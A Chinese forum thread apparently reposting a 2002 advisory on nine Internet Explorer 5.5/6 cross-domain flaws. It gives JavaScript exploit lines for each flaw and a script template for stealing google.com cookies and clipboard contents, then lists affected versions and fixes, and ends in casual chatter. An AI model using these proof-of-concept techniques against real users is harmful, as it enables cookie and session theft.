600楼#
发布于:2002-10-26 22:26
虽然引起这9个安全漏洞的都属于同类对象,但是它们中的每一个都是一个单独的漏洞,都可以单独用来进行恶意地攻击。这9个安全漏洞列于下表。其中每个安全漏洞的介绍包括三部分,\"Cache\"表示如何利用有缺陷的对象,\"Exploit\"表示在context中如何验证此缺陷,\"Impact\"表示此缺陷的安全威胁(\"Full access\"表示可以获得目标系统的完全控制权限,包括非法访问受害者的任意文件,伪造任意URL,非法执行任意指令)。
|
|
|
601楼#
发布于:2002-10-26 22:26
1. showModalDialog
Cache: var fVuln=oWin.showModalDialog; Exploit - IE 5.5: fVuln(\"javascript:alert(dialogArguments.document.cookie)\",oWin,\"\"); Exploit - IE 6: Not trivial but possible, by using our old \"analyze.dlg\" vulnerability. Impact: Full access in IE5.5, \"My Computer\" zone access in IE6. |
|
|
602楼#
发布于:2002-10-26 22:27
2. external
Cache: var oVuln=oWin.external; Exploit: oVuln.NavigateAndFind(\"javascript:alert(document.cookie)\",\"\",\"\"); Impact: Full access. |
|
|
603楼#
发布于:2002-10-26 22:27
3. createRange
Cache: var fVuln=oWin.document.selection.createRange; Exploit: fVuln().pasteHTML(\"<img src=\\\"javascript:alert(document.cookie)\\\">\"); Impact: Full access. |
|
|
604楼#
发布于:2002-10-26 22:28
4. elementFromPoint
Cache: var fVuln=oWin.document.elementFromPoint; Exploit: alert(fVuln(1,1).document.cookie); Impact: Full access. |
|
|
605楼#
发布于:2002-10-26 22:28
5. getElementById
Cache: var fVuln=oWin.document.getElementById; Exploit: alert(fVuln(\"ElementIdInNewDoc\").document.cookie); Impact: Full access. |
|
|
606楼#
发布于:2002-10-26 22:29
6. getElementsByName
Cache: var fVuln=oWin.document.getElementsByName; Exploit: alert(fVuln(\"ElementNameInNewDoc\")[0].document.cookie); Impact: Full access. |
|
|
607楼#
发布于:2002-10-26 22:29
7. getElementsByTagName
Cache: var fVuln=oWin.document.getElementsByTagName; Exploit: alert(fVuln(\"BODY\")[0].document.cookie); Impact: Full access. |
|
|
608楼#
发布于:2002-10-26 22:29
8. execCommand
Cache: var fVuln=oWin.document.execCommand; Exploit: fVuln(\"SelectAll\"); fVuln(\"Copy\"); alert(clipboardData.getData(\"text\")); Impact: Read access to the loaded document. |
|
|
609楼#
发布于:2002-10-26 22:30
9. clipboardData
Cache: var oVuln=oWin.clipboardData; Exploit: alert(oVuln.getData(\"text\")); or oVuln.setData(\"text\",\"data\"); Impact: Read/write access to the clipboard, regardless of settings. |
|
|
610楼#
发布于:2002-10-26 22:30
受影响程序:
Microsoft Internet Explorer 5.5 Microsoft Internet Explorer 6.0 以前版本和IE6 SP1不受此缺陷影响 注意,任何使用IE浏览器引擎的其它应用程序也受此影响 |
|
|
611楼#
发布于:2002-10-26 22:31
测试平台:
============== IE5.5 Win98 IE5.5 NT4 IE6 Win98 IE6 Win2000 IE6 WinXP |
|
|
612楼#
发布于:2002-10-26 22:31
攻击方法:
利用下面代码可以非法获得受害者“google.com”的cookie <script language=\"jscript\"> var oWin=open(\"blank.html\",\"victim\",\"width=100,height=100\"); [Cache line here] location.href=\"http://google.com\"; setTimeout( function () { [Exploit line(s) here] }, 3000 ); </script> |
|
|
613楼#
发布于:2002-10-26 22:31
解决方案:
禁止 Active Scripting 使用 IE6 SP1 |
|
|
614楼#
发布于:2002-10-27 01:14
还好还好,终于赶上了
|
|
|
615楼#
发布于:2002-10-27 01:15
还好还好,终于赶上了 算你赶得及时 :D |
|
|
616楼#
发布于:2002-10-27 01:20
凑巧,凑巧而已,大家继续,继续
|
|
|
617楼#
发布于:2002-10-27 01:22
凑巧,凑巧而已,大家继续,继续 呵呵,你就继续梦游吧,我可要吃宵夜去了 :D :D :D 另外,我不反刍 :D :D :D |
|
|
618楼#
发布于:2002-10-27 01:23
去吧去吧,别噎者
|
|
|
619楼#
发布于:2002-10-27 09:14
放分的日子没人来? :(
|
|
|